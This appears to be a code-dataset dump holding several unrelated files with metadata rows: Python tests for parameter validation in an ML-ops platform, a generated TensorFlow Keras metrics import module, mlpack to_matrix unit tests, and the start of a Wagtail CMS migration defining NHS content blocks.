is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": 12.0}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong type
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "text"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": 12.1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": {"foo": "bar"}}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "gs://bucket/path/to/blob/"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
config_dict = {
"outputs": [{"name": "param2", "type": types.FLOAT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={"param2": {"value": "1.1"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param2": {"value": False}}, # auto-conversion (int to 0 to 0.0)
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong type
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"value": "test"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"value": {"foo": "bar"}}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"value": ["gs://bucket/path/to/blob/"]}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
config_dict = {
"outputs": [{"name": "param7", "type": types.WASB}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={
"param7": {"value": "wasbs://container@user.blob.core.windows.net/"}
},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong param
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": "gs://bucket/path/to/blob/"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": "s3://test/this/is/bad/key.txt"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
def test_experiment_and_job_refs_params(self):
config_dict = {
"inputs": [
{"name": "param1", "type": types.INT},
{"name": "param2", "type": types.FLOAT},
{"name": "param9", "type": types.WASB},
{"name": "param11", "type": types.METRIC},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
op = V1Component.from_dict(config_dict)
params = {
"param1": {
"ref": "runs.64332180bfce46eba80a65caf73c5396",
"value": "outputs.foo",
},
"param2": {
"ref": "runs.0de53b5bf8b04a219d12a39c6b92bcce",
"value": "outputs.foo",
},
"param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
"param11": {
"ref": "runs.fcc462d764104eb698d3cca509f34154",
"value": "outputs.accuracy",
},
}
validated_params = ops_params.validate_params(
params=params, inputs=op.inputs, outputs=None, is_template=False
)
assert {p.name: p.param.to_dict() for p in validated_params} == {
"param1": {
"ref": "runs.64332180bfce46eba80a65caf73c5396",
"value": "outputs.foo",
},
"param2": {
"ref": "runs.0de53b5bf8b04a219d12a39c6b92bcce",
"value": "outputs.foo",
},
"param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
"param11": {
"ref": "runs.fcc462d764104eb698d3cca509f34154",
"value": "outputs.accuracy",
},
}
def test_job_refs_params(self):
config_dict = {
"inputs": [
{"name": "param1", "type": types.INT},
{"name": "param9", "type": types.FLOAT},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
params = {
"param1": {"ref": "job.A", "value": "outputs.foo"},
"param9": {"value": 13.1},
}
config = V1Component.from_dict(config_dict)
# Validation outside the context of a pipeline
with self.assertRaises(ValidationError):
ops_params.validate_params(
params=params, inputs=config.inputs, outputs=None, is_template=False
)
def test_component_base_attrs(self):
config_dict = {
"concurrency": "foo",
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
config_dict = {
"concurrency": 2,
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
config_dict = {
"kind": "component",
"matrix": {
"concurrency": 2,
"kind": "mapping",
"values": [{"a": 1}, {"a": 1}],
},
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
config_dict = {
"kind": "component",
"matrix": {
"concurrency": 2,
"kind": "mapping",
"values": [{"a": 1}, {"a": 1}],
},
"schedule": {
"kind": "datetime",
"startAt": local_datetime(now()).isoformat(),
},
"termination": {"timeout": 1000},
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
config_dict = {
"kind": "component",
"termination": {"timeout": 1000},
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
assert config.to_dict() == config_dict
def test_component_and_hooks(self):
config_dict = {
"kind": "component",
"hooks": [
{"trigger": "succeeded", "connection": "connection1", "hubRef": "ref1"},
{"connection": "connection1", "hubRef": "ref2"},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
assert config.to_dict() == config_dict
def test_component_template(self):
config_dict = {
"kind": "component",
"hooks": [
{"trigger": "succeeded", "connection": "connection1", "hubRef": "ref2"},
{"connection": "connection1", "hubRef": "ref2"},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
"template": {
"description": "This is a template, check the fields",
"fields": ["actions[1].hubRef", "hooks[0].trigger"],
},
}
config = V1Component.from_dict(config_dict)
assert config.to_dict() == config_dict
| 37.03
| 88
| 0.509047
| 2,336
| 25,921
| 5.519692
| 0.092038
| 0.044207
| 0.063285
| 0.085621
| 0.890181
| 0.881418
| 0.873895
| 0.865829
| 0.856445
| 0.84233
| 0
| 0.025936
| 0.342541
| 25,921
| 699
| 89
| 37.082976
| 0.730665
| 0.039119
| 0
| 0.743842
| 0
| 0
| 0.157579
| 0.032489
| 0
| 0
| 0
| 0
| 0.067323
| 1
| 0.024631
| false
| 0.004926
| 0.009852
| 0
| 0.036125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a4bfe3c4159df60977b340b9fd5a39892c3e4fd
| 2,095
|
py
|
Python
|
Lib/site-packages/tensorflow/_api/v1/keras/metrics/__init__.py
|
amitdev81296/tensorflow
|
9869739cc142a996432bef4dc91b1f1b165bc27a
|
[
"bzip2-1.0.6"
] | 1
|
2020-07-06T14:18:59.000Z
|
2020-07-06T14:18:59.000Z
|
keras-ResNet50/tensorflow/_api/v1/keras/metrics/__init__.py
|
wuh0007/severless_ML_live
|
088b78b06434583b7443ab877a6cdd80121bb8d1
|
[
"MIT"
] | 4
|
2020-09-26T00:55:50.000Z
|
2022-02-10T01:53:06.000Z
|
keras-ResNet50/tensorflow/_api/v1/keras/metrics/__init__.py
|
wuh0007/severless_ML_live
|
088b78b06434583b7443ab877a6cdd80121bb8d1
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Built-in metrics.
"""
from __future__ import print_function
from tensorflow.python.keras.losses import KLD
from tensorflow.python.keras.losses import KLD as kld
from tensorflow.python.keras.losses import KLD as kullback_leibler_divergence
from tensorflow.python.keras.losses import MAE
from tensorflow.python.keras.losses import MAE as mae
from tensorflow.python.keras.losses import MAE as mean_absolute_error
from tensorflow.python.keras.losses import MAPE
from tensorflow.python.keras.losses import MAPE as mape
from tensorflow.python.keras.losses import MAPE as mean_absolute_percentage_error
from tensorflow.python.keras.losses import MSE
from tensorflow.python.keras.losses import MSE as mean_squared_error
from tensorflow.python.keras.losses import MSE as mse
from tensorflow.python.keras.losses import MSLE
from tensorflow.python.keras.losses import MSLE as mean_squared_logarithmic_error
from tensorflow.python.keras.losses import MSLE as msle
from tensorflow.python.keras.losses import binary_crossentropy
from tensorflow.python.keras.losses import categorical_crossentropy
from tensorflow.python.keras.losses import cosine
from tensorflow.python.keras.losses import cosine as cosine_proximity
from tensorflow.python.keras.losses import hinge
from tensorflow.python.keras.losses import poisson
from tensorflow.python.keras.losses import sparse_categorical_crossentropy
from tensorflow.python.keras.losses import squared_hinge
from tensorflow.python.keras.metrics import binary_accuracy
from tensorflow.python.keras.metrics import categorical_accuracy
from tensorflow.python.keras.metrics import deserialize
from tensorflow.python.keras.metrics import get
from tensorflow.python.keras.metrics import serialize
from tensorflow.python.keras.metrics import sparse_categorical_accuracy
from tensorflow.python.keras.metrics import sparse_top_k_categorical_accuracy
from tensorflow.python.keras.metrics import top_k_categorical_accuracy
del print_function
| 49.880952
| 82
| 0.863484
| 299
| 2,095
| 5.926421
| 0.190635
| 0.288939
| 0.349887
| 0.437359
| 0.801354
| 0.795711
| 0.668736
| 0.443002
| 0.154628
| 0
| 0
| 0
| 0.082578
| 2,095
| 41
| 83
| 51.097561
| 0.921956
| 0.068735
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.969697
| 0
| 0.969697
| 0.060606
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
0a5d9e7314088167293d2f96bbc50e82391dfe45
| 9,224
|
py
|
Python
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 6
|
2015-01-04T04:20:29.000Z
|
2016-07-21T23:30:34.000Z
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-01-23T18:39:30.000Z
|
2021-07-15T13:58:34.000Z
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-01-20T00:54:34.000Z
|
2020-05-16T05:34:32.000Z
|
#/usr/bin/env python
"""
test_dataset_info.py
Test that to_matrix() and to_matrix_with_info() return the correct types.
mlpack is free software; you may redistribute it and/or modify it under the
terms of the 3-clause BSD license. You should have received a copy of the
3-clause BSD license along with mlpack. If not, see
http://www.opensource.org/licenses/BSD-3-Clause for more information.
"""
import unittest
import pandas as pd
import numpy as np
from mlpack.matrix_utils import to_matrix
from mlpack.matrix_utils import to_matrix_with_info
class TestToMatrix(unittest.TestCase):
"""
This class defines tests for the to_matrix() and to_matrix_with_info() utility
functions.
"""
def testPandasToMatrix(self):
"""
Test that a simple pandas numeric matrix can be turned into a numpy ndarray.
"""
d = pd.DataFrame(np.random.randn(100, 4), columns=list('abcd'))
m, _ = to_matrix(d)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.shape[0], 100)
self.assertEqual(m.shape[1], 4)
self.assertEqual(m.dtype, np.dtype(np.double))
colnames = list('abcd')
for i in range(m.shape[1]):
for j in range(m.shape[0]):
self.assertEqual(m[j, i], d[colnames[i]][j])
def testPandasIntToMatrix(self):
"""
Test that a matrix holding ints is properly turned into a double matrix.
"""
d = pd.DataFrame({'a': range(5)})
m, _ = to_matrix(d)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.shape[0], 5)
self.assertEqual(m.shape[1], 1)
for i in range(5):
self.assertEqual(m[i], i)
def testPandasMixedToMatrix(self):
"""
Test that a matrix with one int and one double feature are transformed
correctly.
"""
d = pd.DataFrame({'a': range(50)})
d['b'] = np.random.randn(50, 1)
self.assertEqual(d['a'].dtype, int)
self.assertEqual(d['b'].dtype, np.dtype(np.double))
m, _ = to_matrix(d)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 50)
self.assertEqual(m.shape[1], 2)
colNames = list('ab')
for i in range(2):
for j in range(50):
self.assertEqual(d[colNames[i]][j], m[j, i])
def testArraylikeToMatrix(self):
"""
Test that if we pass some array, we get back the right thing. This array
will be filled with doubles only.
"""
a = [[0.01, 0.02, 0.03],
[0.04, 0.05, 0.06],
[0.07, 0.08, 0.09],
[0.10, 0.11, 0.12]]
m, _ = to_matrix(a)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 4)
self.assertEqual(m.shape[1], 3)
for i in range(4):
for j in range(3):
self.assertEqual(a[i][j], m[i, j])
def testMultitypeArraylikeToMatrix(self):
"""
Test that if we pass an array with multiple types, we get back the right
thing. The numpy ndarray should be filled with doubles only.
"""
a = [[0.01, 0.02, 3],
[0.04, 0.05, 6],
[0.07, 0.08, 9],
[0.10, 0.11, 12]]
m, _ = to_matrix(a)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 4)
self.assertEqual(m.shape[1], 3)
for i in range(4):
for j in range(3):
self.assertEqual(a[i][j], m[i, j])
def testNumpyToMatrix(self):
"""
Make sure we can convert a numpy matrix without copying anything.
"""
m1 = np.random.randn(100, 5)
m2, _ = to_matrix(m1)
self.assertTrue(isinstance(m2, np.ndarray))
self.assertEqual(m2.dtype, np.dtype(np.double))
p1 = m1.__array_interface__
p2 = m2.__array_interface__
self.assertEqual(p1['data'], p2['data'])
def testPandasToMatrixNoCategorical(self):
"""
Make sure that if we pass a Pandas dataframe with no categorical features,
we get back the matrix we expect.
"""
class TestToMatrixWithInfo(unittest.TestCase):
"""
This class defines tests for the to_matrix() and to_matrix_with_info() utility
functions.
"""
def testPandasToMatrix(self):
"""
Test that a simple pandas numeric matrix can be turned into a numpy ndarray.
"""
d = pd.DataFrame(np.random.randn(100, 4), columns=list('abcd'))
m, _, dims = to_matrix_with_info(d, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.shape[0], 100)
self.assertEqual(m.shape[1], 4)
self.assertEqual(m.dtype, np.dtype(np.double))
colnames = list('abcd')
for i in range(m.shape[1]):
for j in range(m.shape[0]):
self.assertEqual(m[j, i], d[colnames[i]][j])
self.assertTrue(dims.shape[0], 4)
self.assertEqual(dims[0], 0)
self.assertEqual(dims[1], 0)
self.assertEqual(dims[2], 0)
self.assertEqual(dims[3], 0)
def testPandasIntToMatrix(self):
"""
Test that a matrix holding ints is properly turned into a double matrix.
"""
d = pd.DataFrame({'a': range(5)})
m, _, dims = to_matrix_with_info(d, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.shape[0], 5)
self.assertEqual(m.shape[1], 1)
for i in range(5):
self.assertEqual(m[i], i)
self.assertTrue(dims.shape[0], 1)
self.assertEqual(dims[0], 0)
def testPandasMixedToMatrix(self):
"""
Test that a matrix with one int and one double feature are transformed
correctly.
"""
d = pd.DataFrame({'a': range(50)})
d['b'] = np.random.randn(50, 1)
self.assertEqual(d['a'].dtype, int)
self.assertEqual(d['b'].dtype, np.dtype(np.double))
m, _, dims = to_matrix_with_info(d, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 50)
self.assertEqual(m.shape[1], 2)
colNames = list('ab')
for i in range(2):
for j in range(50):
self.assertEqual(d[colNames[i]][j], m[j, i])
self.assertEqual(dims.shape[0], 2)
self.assertEqual(dims[0], 0)
self.assertEqual(dims[1], 0)
def testArraylikeToMatrix(self):
"""
Test that if we pass some array, we get back the right thing. This array
will be filled with doubles only.
"""
a = [[0.01, 0.02, 0.03],
[0.04, 0.05, 0.06],
[0.07, 0.08, 0.09],
[0.10, 0.11, 0.12]]
m, _, dims = to_matrix_with_info(a, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 4)
self.assertEqual(m.shape[1], 3)
for i in range(4):
for j in range(3):
self.assertEqual(a[i][j], m[i, j])
self.assertEqual(dims.shape[0], 3)
self.assertEqual(dims[0], 0)
self.assertEqual(dims[1], 0)
self.assertEqual(dims[2], 0)
def testMultitypeArraylikeToMatrix(self):
"""
Test that if we pass an array with multiple types, we get back the right
thing. The numpy ndarray should be filled with doubles only.
"""
a = [[0.01, 0.02, 3],
[0.04, 0.05, 6],
[0.07, 0.08, 9],
[0.10, 0.11, 12]]
m, _, dims = to_matrix_with_info(a, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(m.shape[0], 4)
self.assertEqual(m.shape[1], 3)
for i in range(4):
for j in range(3):
self.assertEqual(a[i][j], m[i, j])
self.assertEqual(dims.shape[0], 3)
self.assertEqual(dims[0], 0)
self.assertEqual(dims[1], 0)
self.assertEqual(dims[2], 0)
def testNumpyToMatrix(self):
"""
Make sure we can convert a numpy matrix without copying anything.
"""
m1 = np.random.randn(100, 5)
m2, _, dims = to_matrix_with_info(m1, np.double)
self.assertTrue(isinstance(m2, np.ndarray))
self.assertEqual(m2.dtype, np.dtype(np.double))
p1 = m1.__array_interface__
p2 = m2.__array_interface__
self.assertEqual(p1['data'], p2['data'])
self.assertEqual(dims.shape[0], 5)
self.assertEqual(dims[0], 0)
self.assertEqual(dims[1], 0)
self.assertEqual(dims[2], 0)
self.assertEqual(dims[3], 0)
self.assertEqual(dims[4], 0)
def testCategoricalOnly(self):
"""
Make sure that we can convert a categorical-only Pandas matrix.
"""
d = pd.DataFrame({"A": ["a", "b", "c", "a"] })
d["A"] = d["A"].astype('category') # Convert to categorical.
m, _, dims = to_matrix_with_info(d, np.double)
self.assertTrue(isinstance(m, np.ndarray))
self.assertEqual(m.dtype, np.dtype(np.double))
self.assertEqual(dims.shape[0], 1)
self.assertEqual(dims[0], 1)
self.assertEqual(m.shape[0], 4)
self.assertEqual(m.shape[1], 1)
self.assertEqual(m[0], m[3])
self.assertTrue(m[0] != m[1])
self.assertTrue(m[1] != m[2])
self.assertTrue(m[0] != m[2])
def test_suite():
"""
Run all tests.
"""
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTest(loader.loadTestsFromTestCase(TestToMatrix))
suite.addTest(loader.loadTestsFromTestCase(TestToMatrixWithInfo))
return suite
if __name__ == '__main__':
unittest.main()
| 28.915361
| 80
| 0.63389
| 1,406
| 9,224
| 4.095306
| 0.128734
| 0.192775
| 0.100035
| 0.080236
| 0.852032
| 0.82216
| 0.814345
| 0.797499
| 0.786732
| 0.786732
| 0
| 0.043131
| 0.213248
| 9,224
| 318
| 81
| 29.006289
| 0.75031
| 0.202082
| 0
| 0.829787
| 0
| 0
| 0.009757
| 0
| 0
| 0
| 0
| 0
| 0.489362
| 1
| 0.079787
| false
| 0
| 0.026596
| 0
| 0.12234
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a75206ad45bd5247de3fd4954b7ce63eff28045
| 12,707
|
py
|
Python
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 1
|
2021-02-04T13:20:31.000Z
|
2021-02-04T13:20:31.000Z
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 77
|
2020-11-29T23:10:16.000Z
|
2022-03-23T11:47:51.000Z
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 3
|
2021-03-19T09:23:59.000Z
|
2021-08-31T21:49:36.000Z
|
# Generated by Django 3.1.2 on 2020-11-18 21:24
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.blocks.field_block
import wagtail.core.fields
import wagtail.images.blocks
import wagtailnhsukfrontend.blocks
class Migration(migrations.Migration):
dependencies = [
('pages', '0019_auto_20201118_2121'),
]
operations = [
migrations.AlterField(
model_name='basepage',
name='body',
field=wagtail.core.fields.StreamField([('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('care_card', wagtail.core.blocks.StructBlock([('type', wagtail.core.blocks.ChoiceBlock(choices=[('primary', 'Non-urgent'), ('urgent', 'Urgent'), ('immediate', 'Immediate')])), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('details', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('details', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('do_list', wagtail.core.blocks.StructBlock([('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('label', wagtail.core.blocks.CharBlock(help_text='Adding a label here will overwrite the default of Do', label='Heading', required=False)), ('do', wagtail.core.blocks.ListBlock(wagtail.core.blocks.field_block.RichTextBlock))])), ('dont_list', wagtail.core.blocks.StructBlock([('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('label', wagtail.core.blocks.CharBlock(help_text="Adding a label here will overwrite the default of Don't", label='Heading', required=False)), ('dont', wagtail.core.blocks.ListBlock(wagtail.core.blocks.field_block.RichTextBlock))])), ('expander', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('expander_group', wagtail.core.blocks.StructBlock([('expanders', 